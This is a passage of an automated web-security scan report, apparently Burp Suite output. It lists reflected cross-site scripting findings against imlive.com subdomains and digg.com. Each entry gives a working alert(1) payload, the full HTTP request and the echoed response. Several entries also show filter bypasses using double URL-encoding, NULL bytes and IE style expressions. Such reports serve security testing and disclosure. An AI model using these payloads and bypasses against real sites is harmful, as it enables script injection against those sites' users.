Date: Sat, 29 Jan 2011 01:59:57 GMT
Connection: close
Content-Length: 2280

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='3e84a";alert(1)//8ca396aaf64';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=3e84a";alert(1)//8ca396aaf64;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


...[SNIP]...

4.276. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d94"><script>alert(1)</script>9f278dc55b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?23d94"><script>alert(1)</script>9f278dc55b9=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jcjlwv45cdqvuq45jg2ymj55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jcjlwv45cdqvuq45jg2ymj55; path=/; HttpOnly
Set-Cookie: spvdr=vd=a5fba809-a8f8-4ede-a672-0e8009aef27d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:57 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:57 GMT
Connection: close
Content-Length: 19484
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||23d94"><script>alert(1)</script>9f278dc55b9~1');return false;">
...[SNIP]...

4.277. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621b5'-alert(1)-'46747e803cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?621b5'-alert(1)-'46747e803cf=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0j1k2i45sqmefs55bexfj02y; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0j1k2i45sqmefs55bexfj02y; path=/; HttpOnly
Set-Cookie: spvdr=vd=19204602-dd52-49f1-bfdd-42f8de7ee2b0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:59 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:59 GMT
Connection: close
Content-Length: 19083
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=de.imlive.com&ul=/?621b5'-alert(1)-'46747e803cf=1&qs=621b5'-alert(1)-'46747e803cf=1&qs=621b5'-alert(1)-'46747e803cf=1&iu=1&vd=19204602-dd52-49f1-bfdd-42f8de7ee2b0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefi
...[SNIP]...

4.278. http://de.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12af"><script>alert(1)</script>f4d60ab8f81 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:20 GMT
Connection: close
Content-Length: 23399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.279. http://de.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee4f7"><script>alert(1)</script>0f4356d3bc3 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:27 GMT
Connection: close
Content-Length: 23399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.280. http://de.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d was submitted in the gotopage parameter. This input was echoed as db58b'onerror='alert(1)'44c9eed88d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=CEBIMIMAOCCIFKMLDLMBDPAK; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8303
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=de.imlive.com&ul=/waccess/db58b'onerror='alert(1)'44c9eed88d/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://de.imlive.com:80/waccess/db58b'onerror='alert(1)'44c9eed88d/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.281. http://de.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f5f"><script>alert(1)</script>74d0037b57 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:15 GMT
Connection: close
Content-Length: 23378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.282. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0098146"><script>alert(1)</script>ae1b0ab27fe was submitted in the REST URL parameter 1. This input was echoed as 98146"><script>alert(1)</script>ae1b0ab27fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0098146"><script>alert(1)</script>ae1b0ab27fe HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:39 GMT; path=/; domain=digg.com
Set-Cookie: d=a6465da0214166cb14b90685af0020dabf903b4a9ea50b7e049ecdbb6e3f70fc; expires=Thu, 28-Jan-2021 15:33:19 GMT; path=/; domain=.digg.com
X-Digg-Time: D=268933 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15619

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0098146"><script>alert(1)</script>ae1b0ab27fe.rss">
...[SNIP]...

4.283. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31330"><script>alert(1)</script>1979371c19a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?31330"><script>alert(1)</script>1979371c19a=1 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fhoqceug33qmnu45dn3rjvyl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fhoqceug33qmnu45dn3rjvyl; path=/; HttpOnly
Set-Cookie: spvdr=vd=08c8b62a-81bb-4ccd-978f-3cf95bc4ad01&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:07 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 19081
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||31330"><script>alert(1)</script>1979371c19a~1');return false;">
...[SNIP]...

4.284. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d4'-alert(1)-'409ace51e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?669d4'-alert(1)-'409ace51e58=1 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bwwvfz45rdxmr0upkhiua545; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bwwvfz45rdxmr0upkhiua545; path=/; HttpOnly
Set-Cookie: spvdr=vd=3a08158f-8d99-43ce-b530-e98b6793f7a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 18680
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=dk.imlive.com&ul=/?669d4'-alert(1)-'409ace51e58=1&qs=669d4'-alert(1)-'409ace51e58=1&qs=669d4'-alert(1)-'409ace51e58=1&iy=dallas&id=44&iu=1&vd=3a08158f-8d99-43ce-b530-e98b6793f7a9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.285. http://dk.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b96"><script>alert(1)</script>aa918e4b7e3 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:58 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.286. http://dk.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d099c"><script>alert(1)</script>1462ebc3ff2 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:05 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.287. http://dk.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 was submitted in the gotopage parameter. This input was echoed as 2babb'style='x:expression(alert(1))'730ccb26132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

